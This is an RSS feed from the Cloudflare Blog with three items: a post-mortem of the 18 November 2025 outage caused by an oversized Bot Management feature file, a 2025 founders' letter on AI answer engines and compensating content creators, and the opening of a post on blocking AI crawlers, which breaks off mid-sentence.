
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        
        <lastBuildDate>Fri, 10 Apr 2026 17:26:02 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Cloudflare outage on November 18, 2025]]></title>
            <link>https://blog.cloudflare.com/18-november-2025-outage/</link>
            <pubDate>Tue, 18 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare suffered a service outage on November 18, 2025. The outage was triggered by a bug in generation logic for a Bot Management feature file causing many Cloudflare services to be affected. 
 ]]></description>
            <content:encoded><![CDATA[ <p>On 18 November 2025 at 11:20 UTC (all times in this blog are UTC), Cloudflare's network began experiencing significant failures to deliver core network traffic. This showed up to Internet users trying to access our customers' sites as an error page indicating a failure within Cloudflare's network.  </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3ony9XsTIteX8DNEFJDddJ/7da2edd5abca755e9088002a0f5d1758/BLOG-3079_2.png" />
          </figure><p><b>The issue was not caused, directly or indirectly, by a cyber attack or malicious activity of any kind.</b> Instead, it was triggered by a change to one of our database systems' permissions which caused the database to output multiple entries into a “feature file” used by our Bot Management system. That feature file, in turn, doubled in size. The larger-than-expected feature file was then propagated to all the machines that make up our network.</p><p>The software running on these machines to route traffic across our network reads this feature file to keep our Bot Management system up to date with ever changing threats. The software had a limit on the size of the feature file that was below its doubled size. That caused the software to fail.</p><p>After we initially wrongly suspected the symptoms we were seeing were caused by a hyper-scale DDoS attack, we correctly identified the core issue and were able to stop the propagation of the larger-than-expected feature file and replace it with an earlier version of the file. Core traffic was largely flowing as normal by 14:30. We worked over the next few hours to mitigate increased load on various parts of our network as traffic rushed back online. As of 17:06 all systems at Cloudflare were functioning as normal.</p><p>We are sorry for the impact to our customers and to the Internet in general. Given Cloudflare's importance in the Internet ecosystem any outage of any of our systems is unacceptable. That there was a period of time where our network was not able to route traffic is deeply painful to every member of our team. We know we let you down today.</p><p>This post is an in-depth recount of exactly what happened and what systems and processes failed. It is also the beginning, though not the end, of what we plan to do in order to make sure an outage like this will not happen again.</p>
    <div>
      <h2>The outage</h2>
      <a href="#the-outage">
        
      </a>
    </div>
    <p>The chart below shows the volume of 5xx error HTTP status codes served by the Cloudflare network. Normally this should be very low, and it was right up until the start of the outage. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7GdZcWhEqNjwOmLcsKOXT0/fca7e6970d422d04c81b2baafb988cbe/BLOG-3079_3.png" />
          </figure><p>The volume prior to 11:20 is the expected baseline of 5xx errors observed across our network. The spike, and subsequent fluctuations, show our system failing due to loading the incorrect feature file. What’s notable is that our system would then recover for a period. This was very unusual behavior for an internal error.</p><p>The explanation was that the file was being generated every five minutes by a query running on a ClickHouse database cluster, which was being gradually updated to improve permissions management. Bad data was only generated if the query ran on a part of the cluster which had been updated. As a result, every five minutes there was a chance of either a good or a bad set of configuration files being generated and rapidly propagated across the network.</p><p>This fluctuation made it unclear what was happening as the entire system would recover and then fail again as sometimes good, sometimes bad configuration files were distributed to our network. Initially, this led us to believe this might be caused by an attack. Eventually, every ClickHouse node was generating the bad configuration file and the fluctuation stabilized in the failing state.</p><p>Errors continued until the underlying issue was identified and resolved starting at 14:30. We solved the problem by stopping the generation and propagation of the bad feature file and manually inserting a known good file into the feature file distribution queue. And then forcing a restart of our core proxy.</p><p>The remaining long tail in the chart above is our team restarting remaining services that had entered a bad state, with 5xx error code volume returning to normal at 17:06.</p><p>The following services were impacted:</p><table><tr><th><p><b>Service / Product</b></p></th><th><p><b>Impact description</b></p></th></tr><tr><td><p>Core CDN and security services</p></td><td><p>HTTP 5xx status codes. The screenshot at the top of this post shows a typical error page delivered to end users.</p></td></tr><tr><td><p>Turnstile</p></td><td><p>Turnstile failed to load.</p></td></tr><tr><td><p>Workers KV</p></td><td><p>Workers KV returned a significantly elevated level of HTTP 5xx errors as requests to KV’s “front end” gateway failed due to the core proxy failing.</p></td></tr><tr><td><p>Dashboard</p></td><td><p>While the dashboard was mostly operational, most users were unable to log in due to Turnstile being unavailable on the login page.</p></td></tr><tr><td><p>Email Security</p></td><td><p>While email processing and delivery were unaffected, we observed a temporary loss of access to an IP reputation source which reduced spam-detection accuracy and prevented some new-domain-age detections from triggering, with no critical customer impact observed. We also saw failures in some Auto Move actions; all affected messages have been reviewed and remediated.</p></td></tr><tr><td><p>Access</p></td><td><p>Authentication failures were widespread for most users, beginning at the start of the incident and continuing until the rollback was initiated at 13:05. Any existing Access sessions were unaffected.</p><p>
</p><p>All failed authentication attempts resulted in an error page, meaning none of these users ever reached the target application while authentication was failing. Successful logins during this period were correctly logged during this incident. </p><p>
</p><p>Any Access configuration updates attempted at that time would have either failed outright or propagated very slowly. All configuration updates are now recovered.</p></td></tr></table><p>As well as returning HTTP 5xx errors, we observed significant increases in latency of responses from our CDN during the impact period. This was due to large amounts of CPU being consumed by our debugging and observability systems, which automatically enhance uncaught errors with additional debugging information.</p>
    <div>
      <h2>How Cloudflare processes requests, and how this went wrong today</h2>
      <a href="#how-cloudflare-processes-requests-and-how-this-went-wrong-today">
        
      </a>
    </div>
    <p>Every request to Cloudflare takes a well-defined path through our network. It could be from a browser loading a webpage, a mobile app calling an API, or automated traffic from another service. These requests first terminate at our HTTP and TLS layer, then flow into our core proxy system (which we call FL for “Frontline”), and finally through Pingora, which performs cache lookups or fetches data from the origin if needed.</p><p>We previously shared more detail about how the core proxy works <a href="https://blog.cloudflare.com/20-percent-internet-upgrade/."><u>here</u></a>. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6qlWXM3gh4SaYYvsGc7mFV/99294b22963bb414435044323aed7706/BLOG-3079_4.png" />
          </figure><p>As a request transits the core proxy, we run the various security and performance products available in our network. The proxy applies each customer’s unique configuration and settings, from enforcing WAF rules and DDoS protection to routing traffic to the Developer Platform and R2. It accomplishes this through a set of domain-specific modules that apply the configuration and policy rules to traffic transiting our proxy.</p><p>One of those modules, Bot Management, was the source of today’s outage. </p><p>Cloudflare’s <a href="https://www.cloudflare.com/application-services/products/bot-management/"><u>Bot Management</u></a> includes, among other systems, a machine learning model that we use to generate bot scores for every request traversing our network. Our customers use bot scores to control which bots are allowed to access their sites — or not.</p><p>The model takes as input a “feature” configuration file. A feature, in this context, is an individual trait used by the machine learning model to make a prediction about whether the request was automated or not. The feature configuration file is a collection of individual features.</p><p>This feature file is refreshed every few minutes and published to our entire network and allows us to react to variations in traffic flows across the Internet. It allows us to react to new types of bots and new bot attacks. So it’s critical that it is rolled out frequently and rapidly as bad actors change their tactics quickly.</p><p>A change in our underlying ClickHouse query behaviour (explained below) that generates this file caused it to have a large number of duplicate “feature” rows. This changed the size of the previously fixed-size feature configuration file, causing the bots module to trigger an error.</p><p>As a result, HTTP 5xx error codes were returned by the core proxy system that handles traffic processing for our customers, for any traffic that depended on the bots module. This also affected Workers KV and Access, which rely on the core proxy.</p><p>Unrelated to this incident, we were and are currently migrating our customer traffic to a new version of our proxy service, internally known as <a href="https://blog.cloudflare.com/20-percent-internet-upgrade/"><u>FL2</u></a>. Both versions were affected by the issue, although the impact observed was different.</p><p>Customers deployed on the new FL2 proxy engine, observed HTTP 5xx errors. Customers on our old proxy engine, known as FL, did not see errors, but bot scores were not generated correctly, resulting in all traffic receiving a bot score of zero. Customers that had rules deployed to block bots would have seen large numbers of false positives. Customers who were not using our bot score in their rules did not see any impact.</p><p>Throwing us off and making us believe this might have been an attack was another apparent symptom we observed: Cloudflare’s status page went down. The status page is hosted completely off Cloudflare’s infrastructure with no dependencies on Cloudflare. While it turned out to be a coincidence, it led some of the team diagnosing the issue to believe that an attacker may be targeting both our systems as well as our status page. Visitors to the status page at that time were greeted by an error message:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7LwbB5fv7vdoNRWWDGN7ia/dad8cef76eee1305e0216d74a813612b/BLOG-3079_5.png" />
          </figure><p>In the internal incident chat room, we were concerned that this might be the continuation of the recent spate of high volume <a href="https://techcommunity.microsoft.com/blog/azureinfrastructureblog/defending-the-cloud-azure-neutralized-a-record-breaking-15-tbps-ddos-attack/4470422"><u>Aisuru</u></a> <a href="https://blog.cloudflare.com/defending-the-internet-how-cloudflare-blocked-a-monumental-7-3-tbps-ddos/"><u>DDoS attacks</u></a>:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3Ph13HSsOGC0KYRfoeZmSy/46522e46ed0132d2ea551aef4c71a5d6/BLOG-3079_6.png" />
          </figure>
    <div>
      <h3>The query behaviour change</h3>
      <a href="#the-query-behaviour-change">
        
      </a>
    </div>
    <p>I mentioned above that a change in the underlying query behaviour resulted in the feature file containing a large number of duplicate rows. The database system in question uses ClickHouse’s software.</p><p>For context, it’s helpful to know how ClickHouse distributed queries work. A ClickHouse cluster consists of many shards. To query data from all shards, we have so-called distributed tables (powered by the table engine <code>Distributed</code>) in a database called <code>default</code>. The Distributed engine queries underlying tables in a database <code>r0</code>. The underlying tables are where data is stored on each shard of a ClickHouse cluster.</p><p>Queries to the distributed tables run through a shared system account. As part of efforts to improve our distributed queries security and reliability, there’s work being done to make them run under the initial user accounts instead.</p><p>Before today, ClickHouse users would only see the tables in the <code>default</code> database when querying table metadata from ClickHouse system tables such as <code>system.tables</code> or <code>system.columns</code>.</p><p>Since users already have implicit access to underlying tables in <code>r0</code>, we made a change at 11:05 to make this access explicit, so that users can see the metadata of these tables as well. By making sure that all distributed subqueries can run under the initial user, query limits and access grants can be evaluated in a more fine-grained manner, avoiding one bad subquery from a user affecting others.</p><p>The change explained above resulted in all users accessing accurate metadata about tables they have access to. Unfortunately, there were assumptions made in the past, that the list of columns returned by a query like this would only include the “<code>default</code>” database:</p><p><code>SELECT
  name,
  type
FROM system.columns
WHERE
  table = 'http_requests_features'
order by name;</code></p><p>Note how the query does not filter for the database name. With us gradually rolling out the explicit grants to users of a given ClickHouse cluster, after the change at 11:05 the query above started returning “duplicates” of columns because those were for underlying tables stored in the r0 database.</p><p>This, unfortunately, was the type of query that was performed by the Bot Management feature file generation logic to construct each input “feature” for the file mentioned at the beginning of this section. </p><p>The query above would return a table of columns like the one displayed (simplified example):</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/ZIC5X8vMM7ifbJc0vxgLD/49dd33e7267bdb03b265ee0acccf381d/Screenshot_2025-11-18_at_2.51.24%C3%A2__PM.png" />
          </figure><p>However, as part of the additional permissions that were granted to the user, the response now contained all the metadata of the <code>r0</code> schema effectively more than doubling the rows in the response ultimately affecting the number of rows (i.e. features) in the final file output. </p>
    <div>
      <h3>Memory preallocation</h3>
      <a href="#memory-preallocation">
        
      </a>
    </div>
    <p>Each module running on our proxy service has a number of limits in place to avoid unbounded memory consumption and to preallocate memory as a performance optimization. In this specific instance, the Bot Management system has a limit on the number of machine learning features that can be used at runtime. Currently that limit is set to 200, well above our current use of ~60 features. Again, the limit exists because for performance reasons we preallocate memory for the features.</p><p>When the bad file with more than 200 features was propagated to our servers, this limit was hit — resulting in the system panicking. The FL2 Rust code that makes the check and was the source of the unhandled error is shown below:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/640fjk9dawDk7f0wJ8Jm5S/668bcf1f574ae9e896671d9eee50da1b/BLOG-3079_7.png" />
          </figure><p>This resulted in the following panic which in turn resulted in a 5xx error:</p><p><code>thread fl2_worker_thread panicked: called Result::unwrap() on an Err value</code></p>
    <div>
      <h3>Other impact during the incident</h3>
      <a href="#other-impact-during-the-incident">
        
      </a>
    </div>
    <p>Other systems that rely on our core proxy were impacted during the incident. This included Workers KV and Cloudflare Access. The team was able to reduce the impact to these systems at 13:04, when a patch was made to Workers KV to bypass the core proxy. Subsequently, all downstream systems that rely on Workers KV (such as Access itself) observed a reduced error rate. </p><p>The Cloudflare Dashboard was also impacted due to both Workers KV being used internally and Cloudflare Turnstile being deployed as part of our login flow.</p><p>Turnstile was impacted by this outage, resulting in customers who did not have an active dashboard session being unable to log in. This showed up as reduced availability during two time periods: from 11:30 to 13:10, and between 14:40 and 15:30, as seen in the graph below.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/nB2ZlYyXiGTNngsVotyjN/479a0f9273c160c63925be87592be023/BLOG-3079_8.png" />
          </figure><p>The first period, from 11:30 to 13:10, was due to the impact to Workers KV, which some control plane and dashboard functions rely upon. This was restored at 13:10, when Workers KV bypassed the core proxy system.

The second period of impact to the dashboard occurred after restoring the feature configuration data. A backlog of login attempts began to overwhelm the dashboard. This backlog, in combination with retry attempts, resulted in elevated latency, reducing dashboard availability. Scaling control plane concurrency restored availability at approximately 15:30.</p>
    <div>
      <h2>Remediation and follow-up steps</h2>
      <a href="#remediation-and-follow-up-steps">
        
      </a>
    </div>
    <p>Now that our systems are back online and functioning normally, work has already begun on how we will harden them against failures like this in the future. In particular we are:</p><ul><li><p>Hardening ingestion of Cloudflare-generated configuration files in the same way we would for user-generated input</p></li><li><p>Enabling more global kill switches for features</p></li><li><p>Eliminating the ability for core dumps or other error reports to overwhelm system resources</p></li><li><p>Reviewing failure modes for error conditions across all core proxy modules</p></li></ul><p>Today was Cloudflare's worst outage <a href="https://blog.cloudflare.com/details-of-the-cloudflare-outage-on-july-2-2019/"><u>since 2019</u></a>. We've had outages that have made our <a href="https://blog.cloudflare.com/post-mortem-on-cloudflare-control-plane-and-analytics-outage/"><u>dashboard unavailable</u></a>. Some that have caused <a href="https://blog.cloudflare.com/cloudflare-service-outage-june-12-2025/"><u>newer features</u></a> to not be available for a period of time. But in the last 6+ years we've not had another outage that has caused the majority of core traffic to stop flowing through our network.</p><p>An outage like today is unacceptable. We've architected our systems to be highly resilient to failure to ensure traffic will always continue to flow. When we've had outages in the past it's always led to us building new, more resilient systems.</p><p>On behalf of the entire team at Cloudflare, I would like to apologize for the pain we caused the Internet today. </p><table><tr><th><p>Time (UTC)</p></th><th><p>Status</p></th><th><p>Description</p></th></tr><tr><td><p>11:05</p></td><td><p>Normal.</p></td><td><p>Database access control change deployed.</p></td></tr><tr><td><p>11:28</p></td><td><p>Impact starts.</p></td><td><p>Deployment reaches customer environments, first errors observed on customer HTTP traffic.</p></td></tr><tr><td><p>11:32-13:05</p></td><td><p>The team investigated elevated traffic levels and errors to Workers KV service.</p><p>

</p></td><td><p>The initial symptom appeared to be degraded Workers KV response rate causing downstream impact on other Cloudflare services.</p><p>
</p><p>Mitigations such as traffic manipulation and account limiting were attempted to bring the Workers KV service back to normal operating levels.</p><p>
</p><p>The first automated test detected the issue at 11:31 and manual investigation started at 11:32. The incident call was created at 11:35.</p></td></tr><tr><td><p>13:05</p></td><td><p>Workers KV and Cloudflare Access bypass implemented — impact reduced.</p></td><td><p>During investigation, we used internal system bypasses for Workers KV and Cloudflare Access so they fell back to a prior version of our core proxy. Although the issue was also present in prior versions of our proxy, the impact was smaller as described below.</p></td></tr><tr><td><p>13:37</p></td><td><p>Work focused on rollback of the Bot Management configuration file to a last-known-good version.</p></td><td><p>We were confident that the Bot Management configuration file was the trigger for the incident. Teams worked on ways to repair the service in multiple workstreams, with the fastest workstream a restore of a previous version of the file.</p></td></tr><tr><td><p>14:24</p></td><td><p>Stopped creation and propagation of new Bot Management configuration files.</p></td><td><p>We identified that the Bot Management module was the source of the 500 errors and that this was caused by a bad configuration file. We stopped automatic deployment of new Bot Management configuration files.</p></td></tr><tr><td><p>14:24</p></td><td><p>Test of new file complete.</p></td><td><p>We observed successful recovery using the old version of the configuration file and then focused on accelerating the fix globally.</p></td></tr><tr><td><p>14:30</p></td><td><p>Main impact resolved. Downstream impacted services started observing reduced errors.</p></td><td><p>A correct Bot Management configuration file was deployed globally and most services started operating correctly.</p></td></tr><tr><td><p>17:06</p></td><td><p>All services resolved. Impact ends.</p></td><td><p>All downstream services restarted and all operations fully restored.</p></td></tr></table><p></p> ]]></content:encoded>
            <category><![CDATA[Outage]]></category>
            <category><![CDATA[Post Mortem]]></category>
            <category><![CDATA[Bot Management]]></category>
            <guid isPermaLink="false">oVEUcpjyyDA8DSSXiE7E6</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare’s 2025 Annual Founders’ Letter]]></title>
            <link>https://blog.cloudflare.com/cloudflare-2025-annual-founders-letter/</link>
            <pubDate>Sun, 21 Sep 2025 18:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare launched 15 years ago. We like to celebrate our birthday by launching new products that give back to the Internet. But we've also been thinking a lot about what's changed on the Internet. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Cloudflare <a href="https://www.youtube.com/watch?v=XeKWeBw1R5A"><u>launched 15 years ago</u></a> this week. We like to celebrate our birthday by announcing new products and features that give back to the Internet, which we’ll do a lot of this week. But, on this occasion, we've also been thinking about what's changed on the Internet over the last 15 years and what has not.</p><p>With some things there's been clear progress: when we launched in 2010 less than 10 percent of the Internet was encrypted, today well over 95 percent is encrypted. We're proud of the <a href="https://blog.cloudflare.com/introducing-universal-ssl/"><u>role we played in making that happen</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2MLknOh75r4KpCfiXTjQkw/b80baa01b75437f3b1da24be3ca9e209/Timeline_2_part.png" />
          </figure>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xkR8gdKR1YO1tIr6rLOmv/7e848bbefa83db1078d7ffe35e2bcc51/2.png" />
          </figure><p>Some other areas have seen limited progress: IPv6 adoption has grown steadily but painfully slowly over the last 15 years, in <a href="https://blog.cloudflare.com/introducing-cloudflares-automatic-ipv6-gatewa/"><u>spite</u></a> <a href="https://blog.cloudflare.com/cloudflare-expanding-the-ipv6-web/"><u>of</u></a> <a href="https://blog.cloudflare.com/eliminating-the-last-reasons-to-not-enable-ipv6/"><u>our</u></a> <a href="https://blog.cloudflare.com/amazon-2bn-ipv4-tax-how-avoid-paying/"><u>efforts</u></a>. That's a problem because as IPv4 addresses have become scarce and expensive it’s held back new entrants and driven up the costs of things like networking and cloud computing.</p>
    <div>
      <h2>The Internet’s Business Model</h2>
      <a href="#the-internets-business-model">
        
      </a>
    </div>
    <p>Still other things have remained remarkably consistent: the basic business model of the Internet has for the last 15 years been the same — create compelling content, find a way to be discovered, and then generate value from the resulting traffic. Whether that was through ads or subscriptions or selling things or just the ego of knowing that someone is consuming what you created, traffic generation has been the engine that powered the Internet we know today.</p><p>Make no mistake, the Internet has never been free. There's always been a reward system that transferred value from consumers to creators and, in doing so, filled the Internet with content. Had the Internet not had that reward system it wouldn't be nearly as vibrant as it is today.</p><p>A bit of a trivia aside: why did Cloudflare never build an ad blocker <a href="https://www.answeroverflow.com/m/1123890164222144542"><u>despite many requests</u></a>? Because, as imperfect as they are, ads have been the only micropayment system that has worked at scale to encourage an open Internet while also compensating content creators for their work. Our mission is to help build a better Internet, and a core value is that we’re principled, so we weren’t going to hamper the Internet’s fundamental business model.</p>
    <div>
      <h2>Traffic ≠ Value</h2>
      <a href="#traffic-value">
        
      </a>
    </div>
    <p>But that same traffic-based reward system has also created many of the problems we lament about the current state of the Internet. Traffic has always been an imperfect proxy for value. Over the last 15 years we've watched more of the Internet driven by annoying clickbait or dangerous ragebait. Entire media organizations have built their businesses with a stated objective of writing headlines to generate the maximum cortisol response because that's what generates the maximum amount of traffic.</p><p>Over the years, Cloudflare has at times faced calls for us to intervene and control what content can be published online. As an infrastructure provider, we've never felt we were the right place for those editorial decisions to be made. But it wasn't because we didn't worry about the direction the traffic-incentivized Internet seemed to be headed. It always seemed like what fundamentally needed to change was not more content moderation at the infrastructure level but instead a healthier incentive system for content creation.</p><p>Today the conditions to bring about that change may be happening. In the last year, something core to the Internet we’ve all known has changed. It's being driven by AI and it has an opportunity with some care and nurturing to help bring about what we think may be a much better Internet.</p>
    <div>
      <h2>From Search to Answers</h2>
      <a href="#from-search-to-answers">
        
      </a>
    </div>
    <p>What’s the change? The primary discovery system of the Internet for the last 15 years has been Search Engines. They scraped the Internet's content, built an index, and then presented users with a treasure map which they followed generating traffic. Content creators were happy to let Search Engines scrape their content because there were a limited number of them, so the infrastructure costs were relatively low and, more importantly, because the Search Engines gave something to sites in the form of traffic — the Internet’s historic currency — sent back to sites.</p><p>It’s already clear that the Internet’s discovery system for the next 15 years will be something different: Answer Engines. Unlike Search Engines which gave you a map where you hunted for what you were looking for, driving traffic in the process, Answer Engines just give you the answer without you having to click on anything. For 95 percent of users 95 percent of the time, that is a better user experience.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5d2TQwVHA8GpFUBpAdr8QT/23fd6b7306d55dce3dea9e989784595d/BLOG-2994_3.png" />
          </figure><p>You don’t have to look far to see this is changing rapidly before our eyes. ChatGPT, Anthropic’s Claude, and other AI startups aren’t Search Engines — they’re Answer Engines. Even Google, the search stalwart, is increasingly serving “AI Overviews” in place of 10 blue links. We can often look to sci-fi movies to have a glimpse into our most likely future. In them, the helpful intelligent robot character didn’t answer questions with: “Here are some links you can click on to maybe find what you’re looking for.” Whether you like it or not, the future will increasingly be answers not searches.</p>
    <div>
      <h2>Short Term Pain</h2>
      <a href="#short-term-pain">
        
      </a>
    </div>
    <p>In the short term, this is going to be extremely painful for some industries that are built based on monetizing traffic. It already is. While ecommerce and social applications haven't yet seen a significant drop in traffic as the world switches to Answer Engines, media companies have. Why the difference? Well, for the former, you still need to buy the thing the Answer Engine recommends and, for now, we still value talking with other humans.</p><p>But for media companies, if the Answer Engine gives you the summary of what you’re looking for in most cases you don’t need to read the story. And the loss of traffic for media companies has already been dramatic. It’s not just traditional media. Research groups at investment banks, industry analysts, major consulting firms — they’re all seeing major drops in people finding their content because we are increasingly getting answers not search treasure maps.</p><p>Some say these answer engines or agents are just acting on behalf of humans. Sure but so what? Without a change they will still kill content creators’ businesses. If you ask your agent to summarize twenty different news sources but never actually visit any of them you’re still undermining the business model of those news sources. Agents don’t click on ads. And if those agents are allowed to aggregate information on behalf of multiple users it’s an even bigger problem because then subscription revenue is eliminated as well. Why subscribe to the Wall Street Journal or New York Times or Financial Times or Washington Post if my agent can free ride off some other user who does?</p><p>Unless you believe that content creators should work for free, or that they are somehow not needed anymore — both of which are naive assumptions — something needs to change. A visit from an agent isn’t the same as a visit from a human and therefore should have different rules of the road. If nothing changes, the drop in human traffic to the media ecosystem writ large will kill the business model that has built the content-rich Internet we enjoy today.</p><p>We think that’s an existential threat to one of humanity’s most important creations: the Internet.</p>
    <div>
      <h2>Rewarding Better Content</h2>
      <a href="#rewarding-better-content">
        
      </a>
    </div>
    <p>But there’s reason for optimism. Content is the fuel that powers every AI system and the companies that run those AI systems know ultimately they need to financially support the ecosystem. Because of that it seems potentially we're on the cusp of a new, better, and maybe healthier Internet business model. As content creators use tools like the <a href="https://blog.cloudflare.com/introducing-ai-crawl-control/"><u>ones provided by Cloudflare to restrict AI robots from taking their content without compensation</u></a>, we're already seeing a market emerge and better deals being struck between AI and content companies.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5J0hmMolAcrPKBZSJzKNMw/d78a04e0ae0afb2c578e7b7c1ca8b1c9/BLOG-2994_4.png" />
          </figure><p>What's most interesting is what content companies are getting the best deals. It's not the ragebait headline writers. It's not the news organizations writing yet another take on what's going on in politics. It's not the spammy content farms full of drivel. Instead, it's <a href="https://www.bloomberg.com/news/articles/2025-09-17/reddit-seeks-to-strike-next-ai-content-pact-with-google-openai"><u>Reddit</u></a> and other quirky corners that best remind us of the Internet of old. For those of you old enough, think back to the Internet not of the last 15 years but of the last 35. We’ve lost some of what made that early Internet great, but there are indications that we might finally have the incentives to bring more of it back.</p><p>It seems increasingly likely that in our future, AI-driven Internet — assuming the AI companies are willing to step up, support the ecosystem, and pay for the content that is the most valuable to them — it’s the creative, local, unique, original content that’ll be worth the most. And, if you’re like us, the thing you as an Internet consumer are craving more of is creative, local, unique, original content. And, it turns out, having talked with many of them, that’s the content that content creators are most excited to create.</p>
    <div>
      <h2>A New Internet Business Model</h2>
      <a href="#a-new-internet-business-model">
        
      </a>
    </div>
    <p>So how will the business model work? Well, for the first time in history, we have a pretty good mathematical representation of human knowledge. Sum up all the LLMs and that's what you get. It's not perfect, but it's pretty good. Inherently, the same mathematical model serves as a map for the gaps in human knowledge. Like a block of Swiss Cheese — there's a lot of cheese, but there's also a lot of holes.</p><p>Imagine a future business model of the Internet that doesn't reward traffic-generating ragebait but instead rewards those content creators that help fill in the holes in our collective metaphorical cheese. That will involve some portion of the subscription fees AI companies collect, and some portion of the revenue from the ads they'll inevitably serve, going back to content creators who most enrich the collective knowledge.</p><p>As a rough and simplistic sketch, think of it as some number of dollars per AI company’s monthly active users going into a collective pool to be distributed out to content creators based on what most fills in the holes in the cheese.</p><p>You could imagine an AI company suggesting back to creators that they need more created about topics they may not have enough content about. Say, for example, the carrying capacity of unladened swallows because they know their subscribers of a certain age and proclivity are always looking for answers about that topic. The very pruning algorithms the AI companies use today form a roadmap for what content is worth enough to not be pruned but paid for.</p><p>While today the budget items that differentiate AI companies are how much they can afford to spend on GPUs and top talent, as those things inevitably become more and more commodities it seems likely what will differentiate the different AIs is their access to creative, local, unique, original content. And the math of their algorithms provides them a map of what’s worth the most. While there are a lot of details to work out, those are the ingredients you need for a healthy market.</p>
    <div>
      <h2>Cloudflare’s Role</h2>
      <a href="#cloudflares-role">
        
      </a>
    </div>
    <p>As we think about our role at Cloudflare in this developing market, it's not about protecting the status quo but instead helping catalyze a better business model for the future of Internet content creation. That means creating a level playing field. Ideally there should be lots of AI companies, large and small, and lots of content creators, large and small.</p><p>It can’t be that a new entrant AI company is at a disadvantage to a legacy search engine because one has to pay for content but the other gets it for free. But it’s also critical to realize that the right solution to that current conundrum isn’t that no one pays, it’s that, new or old, everyone who benefits from the ecosystem should contribute back to it based on their relative size.</p><p>It may seem impossibly idealistic today, but the good news is that based on the conversations we’ve had we’re confident if a few market participants tip — whether because they step up and do the right thing or are compelled — we will see the entire market tipping and becoming robust very quickly.</p>
    <div>
      <h2>Supporting the Ecosystem</h2>
      <a href="#supporting-the-ecosystem">
        
      </a>
    </div>
    <p>We can't do this alone and we have no plans to try to. Our mission is not to “build a better Internet” but to “<b><i>help</i></b> build a better Internet.” The solutions developed to facilitate this market need to be open, collaborative, standardized, and shared across many organizations. We’ll take some encouraging steps in that direction with announcements on partnerships and collaborations this week. And we’re proud to be a leader in this space.</p><p>The Internet is an ecosystem and we, other infrastructure providers, along with most importantly both AI companies and content creators, will be critical in ensuring that ecosystem is healthy. We’re excited to partner with those who are ready to step up and do their part to also help build a better Internet. It is possible.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6EHC7vxXoMmle1QFHwGHh9/408b73f7b677701e7242e794efa3cb52/unnamed__29_.png" />
          </figure><p>And we're optimistic that if others can collaborate in supporting the ecosystem we may be at the cusp of a new golden age of the Internet. Our conversations with the leading AI companies nearly all acknowledge that they have a responsibility to give back to the ecosystem and compensate content creators. Confirming this, the largest publishers are reporting they're having much more constructive conversations about licensing their content to those AI companies. And, this week, we'll be announcing new tools to help even the smallest publishers take back control of who can use what they've created.</p><p>It may seem impossible. We think it’s a no-brainer. We're proud of what Cloudflare has accomplished over the last 15 years, but there’s a lot left to do to live up to our mission. So, more than ever, it's clear: giddy up, because we're just getting started!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/15o6NDQsh19vfz6RC9nD5v/03f8f84dc09366ffc617829f35b2e255/BLOG-2994_5.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Founders' Letter]]></category>
            <guid isPermaLink="false">3dHDa6KprJoyjJldD2eInH</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Michelle Zatlyn</dc:creator>
        </item>
        <item>
            <title><![CDATA[Content Independence Day: no AI crawl without compensation!]]></title>
            <link>https://blog.cloudflare.com/content-independence-day-no-ai-crawl-without-compensation/</link>
            <pubDate>Tue, 01 Jul 2025 10:01:00 GMT</pubDate>
            <description><![CDATA[ It’s Content Independence Day: Cloudflare, along with a majority of the world's leading publishers and AI companies, is changing the default to block AI crawlers unless they pay creators for content. ]]></description>
            <content:encoded><![CDATA[ <p>Almost 30 years ago, two graduate students at Stanford University — Larry Page and Sergey Brin — began working on a research project they called Backrub. That, of course, was the project that resulted in Google. But also something more: it created the business model for the web.</p><p>The deal that Google made with content creators was simple: let us copy your content for search, and we'll send you traffic. You, as a content creator, could then derive value from that traffic in one of three ways: running ads against it, selling subscriptions for it, or just getting the pleasure of knowing that someone was consuming your stuff.</p><p>Google facilitated all of this. Search generated traffic. They acquired DoubleClick and built AdSense to help content creators serve ads. And acquired Urchin to launch Google Analytics to let you measure just who was viewing your content at any given moment in time.</p><p>For nearly thirty years, that relationship was what defined the web and allowed it to flourish.</p><p>But that relationship is changing. For the first time in more than a decade, the percentage of searches run on Google is <a href="https://searchengineland.com/google-search-market-share-drops-2024-450497"><u>declining</u></a>. What's taking its place? AI.</p><p>If you're like me, you've been amazed at the new AI systems that have launched over the last two years and find yourself turning to them to answer questions that, 